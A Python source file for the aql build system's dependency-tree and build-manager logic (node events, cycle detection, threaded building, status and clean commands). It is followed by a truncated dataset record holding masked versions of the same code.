ValuesFile #//===========================================================================// @eventStatus def eventNodeActual( settings, node, progress ): msg = "(%s) ACTUAL: %s" % (progress, node.getBuildStr( settings.brief )) logInfo( msg ) #//===========================================================================// @eventStatus def eventNodeOutdated( settings, node, progress ): msg = "(%s) OUTDATED: %s" % (progress, node.getBuildStr( settings.brief )) logInfo( msg ) #//===========================================================================// @eventWarning def eventBuildTargetTwice( settings, value, node1 ): logWarning("Target '%s' is built twice. The last time built by: '%s' " % ( value.name, node1.getBuildStr( settings.brief )) ) #//===========================================================================// @eventError def eventFailedNode( settings, node, error ): msg = node.getBuildStr( settings.brief ) msg += '\n\n%s\n' % (error,) logError( msg ) #//===========================================================================// @eventStatus def eventNodeBuilding( settings, node ): pass #//===========================================================================// @eventStatus def eventNodeBuildingFinished( settings, node, builder_output, progress ): msg = node.getBuildStr( settings.brief ) if settings.with_output and builder_output: msg += '\n' if builder_output: msg += builder_output msg += '\n' msg = "(%s) %s" % (progress, msg) logInfo( msg ) #//===========================================================================// @eventStatus def eventNodeBuildingFailed( settings, node, error ): pass #//===========================================================================// @eventStatus def eventNodeRemoved( settings, node, progress ): msg = node.getBuildStr( settings.brief ) if msg: logInfo( "(%s) Removed: %s" % (progress, msg) ) #//===========================================================================// class ErrorNodeDependencyCyclic( AqlException ): def __init__( self, node, deps ): msg = "Node '%s' (%s) has a cyclic dependency: %s" % (node, node.getBuildStr(True), deps ) super(ErrorNodeDependencyCyclic, self).__init__( msg ) #//===========================================================================// class ErrorNodeUnknown(AqlException): def __init__( self, node ): msg = "Unknown node '%s'" % (node, ) super(ErrorNodeUnknown, self).__init__( msg ) #//===========================================================================// class ErrorNodeSignatureDifferent(AqlException): def __init__( self, node ): msg = "Two similar nodes have different signatures (sources, builder parameters or dependencies): %s" % (node.getBuildStr( brief = False ), ) super(ErrorNodeSignatureDifferent, self).__init__( msg ) #//===========================================================================// class ErrorNodeDependencyUnknown(AqlException): def __init__( self, node, dep_node ): msg = "Unable to add dependency to node '%s' from node '%s'" % (node, dep_node) super(ErrorNodeDependencyUnknown, self).__init__( msg ) #//===========================================================================// class InternalErrorRemoveNonTailNode( AqlException ): def __init__( self, node ): msg = "Removing non-tail node: %s" % (node,) super(InternalErrorRemoveNonTailNode, self).__init__( msg ) #//===========================================================================// class InternalErrorRemoveUnknownTailNode(AqlException): def __init__( self, node ): msg = "Remove unknown tail node: : %s" % (node,) super(InternalErrorRemoveUnknownTailNode, self).__init__( msg ) #//===========================================================================// class BuildStat (object): __slots__ = \ ( 'total', 'completed', 'failed', ) def __init__(self, total): self.total = total self.completed = 0 self.failed = 0 def addTotal(self, count ): self.total += count def incCompleted(self): self.completed += 1 def incFailed(self): self.failed += 1 def getProgressStr(self): progress = "%s/%s" % (self.completed + self.failed, self.total ) return progress #//===========================================================================// class _NodesTree (object): __slots__ = \ ( 'node2deps', 'dep2nodes', 'tail_nodes', ) #//-------------------------------------------------------// def __init__( self ): self.node2deps = {} self.dep2nodes = {} self.tail_nodes = set() #//-------------------------------------------------------// def __len__(self): return len(self.node2deps) #//-------------------------------------------------------// def __hasCycle( self, node, new_deps ): if node in new_deps: return True deps = set(new_deps) node2deps = self.node2deps while deps: dep = deps.pop() dep_deps = node2deps[dep] if node in dep_deps: return True deps |= dep_deps return False #//-------------------------------------------------------// def __depends( self, node, deps ): node2deps = self.node2deps dep2nodes = self.dep2nodes try: current_node_deps = node2deps[ node ] deps = { dep for dep in deps if not dep.isBuilt() } new_deps = deps - current_node_deps if not new_deps: return if self.__hasCycle( node, new_deps ): raise ErrorNodeDependencyCyclic( node, new_deps ) self.tail_nodes.discard( node ) #//-------------------------------------------------------// current_node_deps.update( new_deps ) #//-------------------------------------------------------// for dep in new_deps: dep2nodes[ dep ].add( node ) except KeyError as dep_node: raise ErrorNodeDependencyUnknown( node, dep_node.args[0] ) #//-------------------------------------------------------// def __add( self, nodes ): for node in nodes: if node not in self.node2deps: self.node2deps[ node ] = set() self.dep2nodes[ node ] = set() self.tail_nodes.add( node ) node_srcnodes = node.getSourceNodes() node_depnodes = node.getDepNodes() self.__add( node_srcnodes ) # TODO: recursively add sources and depends self.__add( node_depnodes ) # It would be better to rewrite this code to avoid the recursion self.__depends( node, node_srcnodes ) self.__depends( node, node_depnodes ) #//-------------------------------------------------------// def add( self, nodes ): self.__add( toSequence( nodes ) ) #//-------------------------------------------------------// def depends( self, node, deps ): deps = toSequence( deps ) self.__add( deps ) self.__depends( node, deps ) #//-------------------------------------------------------// def removeTail( self, node ): node2deps = self.node2deps try: deps = node2deps.pop(node) if deps: raise InternalErrorRemoveNonTailNode( node ) except KeyError as node: raise InternalErrorRemoveUnknownTailNode( node.args[0] ) tail_nodes = self.tail_nodes # tail_nodes.remove( node ) for dep in self.dep2nodes.pop( node ): d = node2deps[ dep ] d.remove( node ) if not d: tail_nodes.add( dep ) #//-------------------------------------------------------// def popTails( self ): tails = self.tail_nodes self.tail_nodes = set() return tails #//-------------------------------------------------------// def __getAllNodes(self, nodes ): nodes = set(toSequence(nodes)) all_nodes = set( nodes ) node2deps = self.node2deps while nodes: node = nodes.pop() try: deps = node2deps[ node ] - all_nodes except KeyError as node: raise ErrorNodeUnknown( node.args[0] ) all_nodes.update( deps ) nodes.update( deps ) return all_nodes #//-------------------------------------------------------// def shrinkTo(self, nodes ): node2deps = self.node2deps dep2nodes = self.dep2nodes ignore_nodes = set(node2deps) - self.__getAllNodes( nodes ) self.tail_nodes -= ignore_nodes for node in ignore_nodes: del node2deps[ node ] del dep2nodes[ node ] for dep_nodes in dep2nodes.values(): dep_nodes.difference_update( ignore_nodes ) #//-------------------------------------------------------// def selfTest( self ): if set(self.node2deps) != set(self.dep2nodes): raise AssertionError("Not all deps are added") all_dep_nodes = set() for node in self.dep2nodes: if node not in self.node2deps: raise AssertionError("Missed node: %s" % (node,) ) node_deps = self.node2deps[node] if not node_deps: if node not in self.tail_nodes: raise AssertionError("Missed tail node: %s, tail_nodes: %s" % (node, self.tail_nodes) ) else: if node in self.tail_nodes: raise AssertionError("Invalid tail node: %s" % (node,) ) all_dep_nodes |= node_deps for dep in node_deps: if node not in self.dep2nodes[dep]: raise AssertionError("node not in self.dep2nodes[dep]: dep: %s, node: %s" % (dep, node) ) if all_dep_nodes - set(self.dep2nodes): raise AssertionError("Not all deps are added") #//===========================================================================// class _VFiles( object ): __slots__ = \ ( 'names', 'handles', ) #//-------------------------------------------------------// def __init__( self ): self.handles = {} self.names = {} #//-------------------------------------------------------// def __iter__(self): raise TypeError() #//-------------------------------------------------------// def __getitem__( self, builder ): builder_name = builder.name try: vfilename = self.names[ builder_name ] except KeyError: vfilename = os.path.join( builder.getBuildDir(), '.aql.db' ) self.names[ builder_name ] = vfilename try: return self.handles[ vfilename ] except KeyError: vfile = ValuesFile( vfilename ) self.handles[ vfilename ] = vfile return vfile #//-------------------------------------------------------// def close(self): for vfile in self.handles.values(): vfile.close() self.handles.clear() self.names.clear() #//-------------------------------------------------------// def __enter__(self): return self #//-------------------------------------------------------// def __exit__(self, exc_type, exc_value, backtrace): self.close() #//===========================================================================// def _buildNode( node ): eventNodeBuilding( node ) out = node.build() if out: try: out = out.strip() except Exception: pass return out #//===========================================================================// class _NodeState( object ): __slots__ = \ ( 'initialized', 'check_depends', 'check_replace', 'check_split', 'check_actual', 'split_nodes', ) def __init__(self ): self.initialized = False self.check_depends = True self.check_replace = True self.check_split = True self.check_actual = True self.split_nodes = None def __str__(self): return "initialized: %s, check_depends: %s, check_replace: %s, check_split: %s, check_actual: %s, split_nodes: %s" %\ (self.initialized, self.check_depends, self.check_replace, self.check_split, self.check_actual, self.split_nodes ) #//===========================================================================// # noinspection PyAttributeOutsideInit class _NodesBuilder (object): __slots__ = \ ( 'vfiles', 'build_manager', 'task_manager', 'node_states', 'building_nodes', ) #//-------------------------------------------------------// def __init__( self, build_manager, jobs = 0, keep_going = False, with_backtrace = True ): self.vfiles = _VFiles() self.node_states = {} self.building_nodes = {} self.build_manager = build_manager self.task_manager = TaskManager( num_threads = jobs, stop_on_fail = not keep_going, with_backtrace = with_backtrace ) #//-------------------------------------------------------// def __enter__(self): return self #//-------------------------------------------------------// def __exit__(self, exc_type, exc_value, backtrace): self.close() #//-------------------------------------------------------// def _getNodeState( self, node ): try: state = self.node_states[ node ] except KeyError: state = _NodeState() self.node_states[ node ] = state return state #//-------------------------------------------------------// def _removeNodeState( self, node ): try: del self.node_states[ node ] except KeyError: pass #//-------------------------------------------------------// def _addBuildingNode( self, node, state ): conflicting_nodes = [] building_nodes = self.building_nodes for name, signature in node.getNamesAndSignatures(): node_signature = (node, signature) other_node, other_signature = building_nodes.setdefault( name, node_signature ) if other_node is not node: if other_signature != signature: raise ErrorNodeSignatureDifferent( node ) conflicting_nodes.append( other_node ) if conflicting_nodes: state.check_actual = True self.build_manager.depends( node, conflicting_nodes ) return True return False #//-------------------------------------------------------// def _removeBuildingNode( self, node ): building_nodes = self.building_nodes for name in node.getNames(): del building_nodes[ name ] #//-------------------------------------------------------// def isBuilding(self): return bool(self.building_nodes) #//-------------------------------------------------------// def _checkPrebuildDepends( self, node ): dep_nodes = node.buildDepends() if dep_nodes: self.build_manager.depends( node, dep_nodes ) return True return False #//-------------------------------------------------------// def _checkPrebuildReplace( self, node ): if node.buildReplace(): new_node_sources = node.getSourceNodes() if new_node_sources: self.build_manager.depends( node, new_node_sources ) return True return False #//-------------------------------------------------------// def _checkPrebuildSplit( self, node, state ): build_manager = self.build_manager if state.check_split: state.check_split = False check_actual = True if node.isBatch() and state.check_actual: # Check for changed sources of BatchNode vfile = self.vfiles[ node.builder ] actual = build_manager.isActualNode( node, vfile ) if actual: self._removeNodeState( node ) build_manager.actualNode( node ) return True check_actual = False split_nodes = node.buildSplit() if split_nodes: state.split_nodes = split_nodes for split_node in split_nodes: split_state = self._getNodeState( split_node ) split_state.check_split = False split_state.check_depends = False split_state.check_replace = False split_state.check_actual = check_actual split_state.initialized = split_node.builder is node.builder self.build_manager.depends( node, split_nodes ) return True elif state.split_nodes is not None: if node.isBatch(): node._populateTargets() else: targets = [] for split_node in state.split_nodes: targets += split_node.getTargetValues() node.target_values = targets self._removeNodeState( node ) self.build_manager.completedSplitNode( node ) return True return False #//-------------------------------------------------------// def _prebuild( self, node, state ): # print( "node: %s, state: %s" % (node, state)) if not state.initialized: node.initiate() state.initialized = True if state.check_depends: state.check_depends = False if self._checkPrebuildDepends( node ): return True if state.check_replace: state.check_replace = False if self._checkPrebuildReplace( node ): return True if self._checkPrebuildSplit( node, state ): return True return False #//-------------------------------------------------------// def build( self, nodes ): build_manager = self.build_manager vfiles = self.vfiles addTask = self.task_manager.addTask tasks_check_period = 10 added_tasks = 0 changed = False for node in nodes: node_state = self._getNodeState( node ) if self._prebuild( node, node_state ): changed = True continue if self._addBuildingNode( node, node_state ): continue if node_state.check_actual: vfile = vfiles[ node.builder ] actual = build_manager.isActualNode( node, vfile ) if actual: self._removeNodeState( node ) self._removeBuildingNode( node ) build_manager.actualNode( node ) changed = True continue addTask( node, _buildNode, node ) added_tasks += 1 if added_tasks == tasks_check_period: changed = self._getFinishedNodes( block = False ) or changed added_tasks = 0 self._getFinishedNodes( block = not changed ) #//-------------------------------------------------------// def _getFinishedNodes( self, block = True ): # print("tasks: %s, finished_tasks: %s" % (self.task_manager.unfinished_tasks, self.task_manager.finished_tasks.qsize())) finished_tasks = self.task_manager.finishedTasks( block = block ) vfiles = self.vfiles build_manager = self.build_manager for task in finished_tasks: node = task.task_id error = task.error self._removeNodeState( node ) self._removeBuildingNode( node ) vfile = vfiles[ node.builder ] if error is None: node.save( vfile ) build_manager.completedNode( node, task.result ) else: if node.isBatch(): node.save( vfile ) build_manager.failedNode( node, error ) return bool(finished_tasks) #//-------------------------------------------------------// def clear( self, nodes ): vfiles = self.vfiles build_manager = self.build_manager for node in nodes: node_state = self._getNodeState( node ) node_state.check_actual = False if self._prebuild( node, node_state ): continue vfile = vfiles[ node.builder ] node.clear( vfile ) build_manager.removedNode( node ) #//-------------------------------------------------------// def status( self, nodes ): vfiles = self.vfiles build_manager = self.build_manager for node in nodes: node_state = self._getNodeState( node ) node_state.check_actual = False if self._prebuild( node, node_state ): continue vfile = vfiles[ node.builder ] if build_manager.isActualNode( node, vfile ): build_manager.actualNodeStatus( node ) else: build_manager.outdatedNodeStatus( node ) #//-------------------------------------------------------// def close( self ): try: self.task_manager.stop() self._getFinishedNodes( block = False ) finally: self.vfiles.close() #//===========================================================================// class BuildManager (object): __slots__ = \ ( '_nodes', '_built_targets', '_failed_nodes', '_built_node_names', 'completed', 'actual', 'explain', ) #//-------------------------------------------------------// def __init__(self): self._nodes = _NodesTree() self.__reset() #//-------------------------------------------------------// def __reset(self, build_always = False, explain = False ): self._built_targets = {} self._failed_nodes = {} self._built_node_names = set() if build_always else None self.completed = 0 self.actual = 0 self.explain = explain #//-------------------------------------------------------// def add( self, nodes ): self._nodes.add( nodes ) #//-------------------------------------------------------// def depends( self, node, deps ): self._nodes.depends( node, deps ) #//-------------------------------------------------------// def __len__(self): return len(self._nodes) #//-------------------------------------------------------// def selfTest( self ): self._nodes.selfTest() #//-------------------------------------------------------// def getTailNodes(self): return self._nodes.popTails() #//-------------------------------------------------------// def actualNodeStatus( self, node ): eventNodeActual( node, self.getProgressStr() ) self.actualNode( node ) #//-------------------------------------------------------// def outdatedNodeStatus( self, node ): self._failed_nodes[ node ] = None eventNodeOutdated( node, self.getProgressStr() ) node.shrink() #//-------------------------------------------------------// def isActualNode( self, node, vfile ): return node.checkActual( vfile, self._built_node_names, self.explain ) #//-------------------------------------------------------// def _addToBuiltNodeNames(self, node ): built_names = self._built_node_names if built_names is not None: built_names.update( node.getNames() ) #//-------------------------------------------------------// def completedSplitNode(self, node ): self._nodes.removeTail( node ) node.shrink() #//-------------------------------------------------------// def actualNode( self, node ): self._nodes.removeTail( node ) self.actual += 1 node.shrink() #//-------------------------------------------------------// def completedNode( self, node, builder_output ): self._checkAlreadyBuilt( node ) self._nodes.removeTail( node ) self._addToBuiltNodeNames( node ) self.completed += 1 eventNodeBuildingFinished( node, builder_output, self.getProgressStr() ) node.shrink() #//-------------------------------------------------------// def failedNode( self, node, error ): self._failed_nodes[ node ] = error eventNodeBuildingFailed( node, error ) #//-------------------------------------------------------// def removedNode( self, node ): self._nodes.removeTail( node ) self.completed += 1 eventNodeRemoved( node, self.getProgressStr() ) node.shrink() #//-------------------------------------------------------// def getProgressStr(self): done = self.completed + self.actual total = len(self._nodes) + done processed = done + len(self._failed_nodes) progress = "%s/%s" % (processed, total) return progress #//-------------------------------------------------------// def close( self ): self._nodes = _NodesTree() #//-------------------------------------------------------// def _checkAlreadyBuilt( self, node ): values = node.getTargetValues() built_targets = self._built_targets for value in values: value_sign = value.signature other_value_sign = built_targets.setdefault( value.valueId(), value_sign ) if other_value_sign != value_sign: eventBuildTargetTwice( value, node ) #//-------------------------------------------------------// def build( self, jobs, keep_going, nodes = None, build_always = False, explain = False, with_backtrace = True ): self.__reset( build_always = build_always, explain = explain ) nodes_tree = self._nodes if nodes is not None: nodes_tree.shrinkTo( nodes ) with _NodesBuilder( self, jobs, keep_going, with_backtrace ) as nodes_builder: while True: tails = self.getTailNodes() if not tails and not nodes_builder.isBuilding(): break nodes_builder.build( tails ) return self.isOk() #//-------------------------------------------------------// def isOk(self): return not bool( self._failed_nodes ) #//-------------------------------------------------------// def failsCount(self): return len( self._failed_nodes ) #//-------------------------------------------------------// def printFails(self ): for node, error in self._failed_nodes.items(): eventFailedNode( node, error ) #//-------------------------------------------------------// def printBuildState(self): logInfo("Failed nodes: %s" % len(self._failed_nodes) ) logInfo("Completed nodes: %s" % self.completed ) logInfo("Actual nodes: %s" % self.actual ) #//-------------------------------------------------------// def printStatusState(self): logInfo("Outdated nodes: %s" % len(self._failed_nodes) ) logInfo("Actual nodes: %s" % self.actual ) #//-------------------------------------------------------// def clear( self, nodes = None ): self.__reset() nodes_tree = self._nodes if nodes is not None: nodes_tree.shrinkTo( nodes ) with _NodesBuilder( self ) as nodes_builder: while True: tails = self.getTailNodes() if not tails: break nodes_builder.clear( tails ) #//-------------------------------------------------------// def status( self, nodes = None, explain = False ): self.__reset( explain = explain ) nodes_tree = self._nodes if nodes is not None: nodes_tree.shrinkTo( nodes ) with _NodesBuilder( self ) as nodes_builder: while True: tails = self.getTailNodes() if not tails: break nodes_builder.status( tails ) return self.isOk()
normal
{ "blob_id": "cbfccffce2884e1cbebe21daf7792eebc1f88571", "index": 6864, "step-1": "<mask token>\n\n\nclass _NodesTree(object):\n <mask token>\n <mask token>\n <mask token>\n\n def __hasCycle(self, node, new_deps):\n if node in new_deps:\n return True\n deps = set(new_deps)\n node2deps = self.node2deps\n while deps:\n dep = deps.pop()\n dep_deps = node2deps[dep]\n if node in dep_deps:\n return True\n deps |= dep_deps\n return False\n\n def __depends(self, node, deps):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n try:\n current_node_deps = node2deps[node]\n deps = {dep for dep in deps if not dep.isBuilt()}\n new_deps = deps - current_node_deps\n if not new_deps:\n return\n if self.__hasCycle(node, new_deps):\n raise ErrorNodeDependencyCyclic(node, new_deps)\n self.tail_nodes.discard(node)\n current_node_deps.update(new_deps)\n for dep in new_deps:\n dep2nodes[dep].add(node)\n except KeyError as dep_node:\n raise ErrorNodeDependencyUnknown(node, dep_node.args[0])\n\n def __add(self, nodes):\n for node in nodes:\n if node not in self.node2deps:\n self.node2deps[node] = set()\n self.dep2nodes[node] = set()\n self.tail_nodes.add(node)\n node_srcnodes = node.getSourceNodes()\n node_depnodes = node.getDepNodes()\n self.__add(node_srcnodes)\n self.__add(node_depnodes)\n self.__depends(node, node_srcnodes)\n self.__depends(node, node_depnodes)\n <mask token>\n\n def depends(self, node, deps):\n deps = toSequence(deps)\n self.__add(deps)\n self.__depends(node, deps)\n\n def removeTail(self, node):\n node2deps = self.node2deps\n try:\n deps = node2deps.pop(node)\n if deps:\n raise InternalErrorRemoveNonTailNode(node)\n except KeyError as node:\n raise InternalErrorRemoveUnknownTailNode(node.args[0])\n tail_nodes = self.tail_nodes\n for dep in self.dep2nodes.pop(node):\n d = node2deps[dep]\n d.remove(node)\n if not d:\n tail_nodes.add(dep)\n <mask token>\n <mask token>\n\n def shrinkTo(self, nodes):\n node2deps = self.node2deps\n dep2nodes = self.dep2nodes\n ignore_nodes = set(node2deps) - self.__getAllNodes(nodes)\n self.tail_nodes -= ignore_nodes\n for node in ignore_nodes:\n del node2deps[node]\n del dep2nodes[node]\n for dep_nodes in dep2nodes.values():\n dep_nodes.difference_update(ignore_nodes)\n\n def selfTest(self):\n if set(self.node2deps) != set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n all_dep_nodes = set()\n for node in self.dep2nodes:\n if node not in self.node2deps:\n raise AssertionError('Missed node: %s' % (node,))\n node_deps = self.node2deps[node]\n if not node_deps:\n if node not in self.tail_nodes:\n raise AssertionError(\n 'Missed tail node: %s, tail_nodes: %s' % (node,\n self.tail_nodes))\n elif node in self.tail_nodes:\n raise AssertionError('Invalid tail node: %s' % (node,))\n all_dep_nodes |= node_deps\n for dep in node_deps:\n if node not in self.dep2nodes[dep]:\n raise AssertionError(\n 'node not in self.dep2nodes[dep]: dep: %s, node: %s' %\n (dep, node))\n if all_dep_nodes - set(self.dep2nodes):\n raise AssertionError('Not all deps are added')\n\n\nclass _VFiles(object):\n __slots__ = 'names', 'handles'\n\n def __init__(self):\n self.handles = {}\n self.names = {}\n\n def __iter__(self):\n raise TypeError()\n\n def __getitem__(self, builder):\n builder_name = builder.name\n try:\n vfilename = self.names[builder_name]\n except KeyError:\n vfilename = os.path.join(builder.getBuildDir(), '.aql.db')\n self.names[builder_name] = vfilename\n try:\n return self.handles[vfilename]\n except KeyError:\n vfile = ValuesFile(vfilename)\n self.handles[vfilename] = vfile\n return vfile\n\n def close(self):\n for vfile in self.handles.values():\n vfile.close()\n self.handles.clear()\n self.names.clear()\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n\n<mask token>\n\n\nclass _NodeState(object):\n __slots__ = ('initialized', 'check_depends', 'check_replace',\n 'check_split', 'check_actual', 'split_nodes')\n\n def __init__(self):\n self.initialized = False\n self.check_depends = True\n self.check_replace = True\n self.check_split = True\n self.check_actual = True\n self.split_nodes = None\n\n def __str__(self):\n return (\n 'initialized: %s, check_depends: %s, check_replace: %s, check_split: %s, check_actual: %s, split_nodes: %s'\n % (self.initialized, self.check_depends, self.check_replace,\n self.check_split, self.check_actual, self.split_nodes))\n\n\nclass _NodesBuilder(object):\n __slots__ = ('vfiles', 'build_manager', 'task_manager', 'node_states',\n 'building_nodes')\n\n def __init__(self, build_manager, jobs=0, keep_going=False,\n with_backtrace=True):\n self.vfiles = _VFiles()\n self.node_states = {}\n self.building_nodes = {}\n self.build_manager = build_manager\n self.task_manager = TaskManager(num_threads=jobs, stop_on_fail=not\n keep_going, with_backtrace=with_backtrace)\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, backtrace):\n self.close()\n\n def _getNodeState(self, node):\n try:\n state = self.node_states[node]\n except KeyError:\n state = _NodeState()\n self.node_states[node] = state\n return state\n\n def _removeNodeState(self, node):\n try:\n del self.node_states[node]\n except KeyError:\n pass\n\n def _addBuildingNode(self, node, state):\n conflicting_nodes = []\n building_nodes = self.building_nodes\n for name, signature in node.getNamesAndSignatures():\n node_signature = node, signature\n other_node, other_signature = building_nodes.setdefault(name,\n node_signature)\n if other_node is not node:\n if other_signature != signature:\n raise ErrorNodeSignatureDifferent(node)\n conflicting_nodes.append(other_node)\n if conflicting_nodes:\n state.check_actual = True\n self.build_manager.depends(node, conflicting_nodes)\n return True\n return False\n\n def _removeBuildingNode(self, node):\n building_nodes = self.building_nodes\n for name in node.getNames():\n del building_nodes[name]\n\n def isBuilding(self):\n return bool(self.building_nodes)\n\n def _checkPrebuildDepends(self, node):\n dep_nodes = node.buildDepends()\n if dep_nodes:\n self.build_manager.depends(node, dep_nodes)\n return True\n return False\n\n def _checkPrebuildReplace(self, node):\n if node.buildReplace():\n new_node_sources = node.getSourceNodes()\n if new_node_sources:\n self.build_manager.depends(node, new_node_sources)\n return True\n return False\n\n def _checkPrebuildSplit(self, node, state):\n build_manager = self.build_manager\n if state.check_split:\n state.check_split = False\n check_actual = True\n if node.isBatch() and state.check_actual:\n vfile = self.vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n build_manager.actualNode(node)\n return True\n check_actual = False\n split_nodes = node.buildSplit()\n if split_nodes:\n state.split_nodes = split_nodes\n for split_node in split_nodes:\n split_state = self._getNodeState(split_node)\n split_state.check_split = False\n split_state.check_depends = False\n split_state.check_replace = False\n split_state.check_actual = check_actual\n split_state.initialized = (split_node.builder is node.\n builder)\n self.build_manager.depends(node, split_nodes)\n return True\n elif state.split_nodes is not None:\n if node.isBatch():\n node._populateTargets()\n else:\n targets = []\n for split_node in state.split_nodes:\n targets += split_node.getTargetValues()\n node.target_values = targets\n self._removeNodeState(node)\n self.build_manager.completedSplitNode(node)\n return True\n return False\n\n def _prebuild(self, node, state):\n if not state.initialized:\n node.initiate()\n state.initialized = True\n if state.check_depends:\n state.check_depends = False\n if self._checkPrebuildDepends(node):\n return True\n if state.check_replace:\n state.check_replace = False\n if self._checkPrebuildReplace(node):\n return True\n if self._checkPrebuildSplit(node, state):\n return True\n return False\n\n def build(self, nodes):\n build_manager = self.build_manager\n vfiles = self.vfiles\n addTask = self.task_manager.addTask\n tasks_check_period = 10\n added_tasks = 0\n changed = False\n for node in nodes:\n node_state = self._getNodeState(node)\n if self._prebuild(node, node_state):\n changed = True\n continue\n if self._addBuildingNode(node, node_state):\n continue\n if node_state.check_actual:\n vfile = vfiles[node.builder]\n actual = build_manager.isActualNode(node, vfile)\n if actual:\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n build_manager.actualNode(node)\n changed = True\n continue\n addTask(node, _buildNode, node)\n added_tasks += 1\n if added_tasks == tasks_check_period:\n changed = self._getFinishedNodes(block=False) or changed\n added_tasks = 0\n self._getFinishedNodes(block=not changed)\n\n def _getFinishedNodes(self, block=True):\n finished_tasks = self.task_manager.finishedTasks(block=block)\n vfiles = self.vfiles\n build_manager = self.build_manager\n for task in finished_tasks:\n node = task.task_id\n error = task.error\n self._removeNodeState(node)\n self._removeBuildingNode(node)\n vfile = vfiles[node.builder]\n if error is None:\n node.save(vfile)\n build_manager.completedNode(node, task.result)\n else:\n if node.isBatch():\n node.save(vfile)\n build_manager.failedNode(node, error)\n return bool(finished_tasks)\n\n def clear(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n node.clear(vfile)\n build_manager.removedNode(node)\n\n def status(self, nodes):\n vfiles = self.vfiles\n build_manager = self.build_manager\n for node in nodes:\n node_state = self._getNodeState(node)\n node_state.check_actual = False\n if self._prebuild(node, node_state):\n continue\n vfile = vfiles[node.builder]\n if build_manager.isActualNode(node, vfile):\n build_manager.actualNodeStatus(node)\n else:\n build_manager.outdatedNodeStatus(node)\n\n def close(self):\n try:\n self.task_manager.stop()\n self._getFinishedNodes(block=False)\n finally:\n self.vfiles.close()\n\n\nclass BuildManager(object):\n __slots__ = ('_nodes', '_built_targets', '_failed_nodes',\n '_built_node_names', 'completed', 'actual', 'explain')\n\n def __init__(self):\n self._nodes = _NodesTree()\n self.__reset()\n\n def __reset(self, build_always=False, explain=False):\n self._built_targets = {}\n self._failed_nodes = {}\n self._built_node_names = set() if build_always else None\n self.completed = 0\n self.actual = 0\n self.explain = explain\n\n def add(self, nodes):\n self._nodes.add(nodes)\n\n def depends(self, node, deps):\n self._nodes.depends(node, deps)\n\n def __len__(self):\n return len(self._nodes)\n\n def selfTest(self):\n self._nodes.selfTest()\n\n def getTailNodes(self):\n return self._nodes.popTails()\n\n def actualNodeStatus(self, node):\n eventNodeActual(node, self.getProgressStr())\n self.actualNode(node)\n\n def outdatedNodeStatus(self, node):\n self._failed_nodes[node] = None\n eventNodeOutdated(node, self.getProgressStr())\n node.shrink()\n\n def isActualNode(self, node, vfile):\n return node.checkActual(vfile, self._built_node_names, self.explain)\n\n def _addToBuiltNodeNames(self, node):\n built_names = self._built_node_names\n if built_names is not None:\n built_names.update(node.getNames())\n\n def completedSplitNode(self, node):\n self._nodes.removeTail(node)\n node.shrink()\n\n def actualNode(self, node):\n self._nodes.removeTail(node)\n self.actual += 1\n node.shrink()\n\n def completedNode(self, node, builder_output):\n self._checkAlreadyBuilt(node)\n self._nodes.removeTail(node)\n self._addToBuiltNodeNames(node)\n self.completed += 1\n eventNodeBuildingFinished(node, builder_output, self.getProgressStr())\n node.shrink()\n\n def failedNode(self, node, error):\n self._failed_nodes[node] = error\n eventNodeBuildingFailed(node, error)\n\n def removedNode(self, node):\n self._nodes.removeTail(node)\n self.completed += 1\n eventNodeRemoved(node, self.getProgressStr())\n node.shrink()\n\n def getProgressStr(self):\n done = self.completed + self.actual\n total = len(self._nodes) + done\n processed = done + len(self._failed_nodes)\n progress = '%s/%s' % (processed, total)\n return progress\n\n def close(self):\n self._nodes = _NodesTree()\n\n def _checkAlreadyBuilt(self, node):\n values = node.getTargetValues()\n built_targets = self._built_targets\n for value in values:\n value_sign = value.signature\n other_value_sign = built_targets.setdefault(value.valueId(),\n value_sign)\n if other_value_sign != value_sign:\n eventBuildTargetTwice(value, node)\n\n def build(self, jobs, keep_going, nodes=None, build_always=False,\n explain=False, with_backtrace=True):\n self.__reset(build_always=build_always, explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self, jobs, keep_going, with_backtrace\n ) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails and not nodes_builder.isBuilding():\n break\n nodes_builder.build(tails)\n return self.isOk()\n\n def isOk(self):\n return not bool(self._failed_nodes)\n\n def failsCount(self):\n return len(self._failed_nodes)\n\n def printFails(self):\n for node, error in self._failed_nodes.items():\n eventFailedNode(node, error)\n\n def printBuildState(self):\n logInfo('Failed nodes: %s' % len(self._failed_nodes))\n logInfo('Completed nodes: %s' % self.completed)\n logInfo('Actual nodes: %s' % self.actual)\n\n def printStatusState(self):\n logInfo('Outdated nodes: %s' % len(self._failed_nodes))\n logInfo('Actual nodes: %s' % self.actual)\n\n def clear(self, nodes=None):\n self.__reset()\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.clear(tails)\n\n def status(self, nodes=None, explain=False):\n self.__reset(explain=explain)\n nodes_tree = self._nodes\n if nodes is not None:\n nodes_tree.shrinkTo(nodes)\n with _NodesBuilder(self) as nodes_builder:\n while True:\n tails = self.getTailNodes()\n if not tails:\n break\n nodes_builder.status(tails)\n return self.isOk()\n", "step-2": "<mask token>\n\n\nclass InternalErrorRemoveNonTailNode(AqlException):\n <mask token>\n\n\nclass InternalErrorRemoveUnknownTailNode(AqlException):\n\n def __init__(self, node):\n msg = 'Remove unknown tail node: : %s' % (node,)\n super(InternalErrorRemoveUnknownTailNode, self).__init__(msg)\n\n\nclass BuildStat(object):\n __slots__ = 'total', 'completed', 'failed'\n\n def __init__(self, total):\n self.total = total\n self.completed = 0\n self.failed = 0\n\n def addTotal(self, count):\n self.total += count\n\n def incCompleted(self):\n self.completed += 1\n\n def incFailed(self):\n self.failed += 1\n\n def getProgressStr(self):\n progress = '%s/%s' % (self.completed + 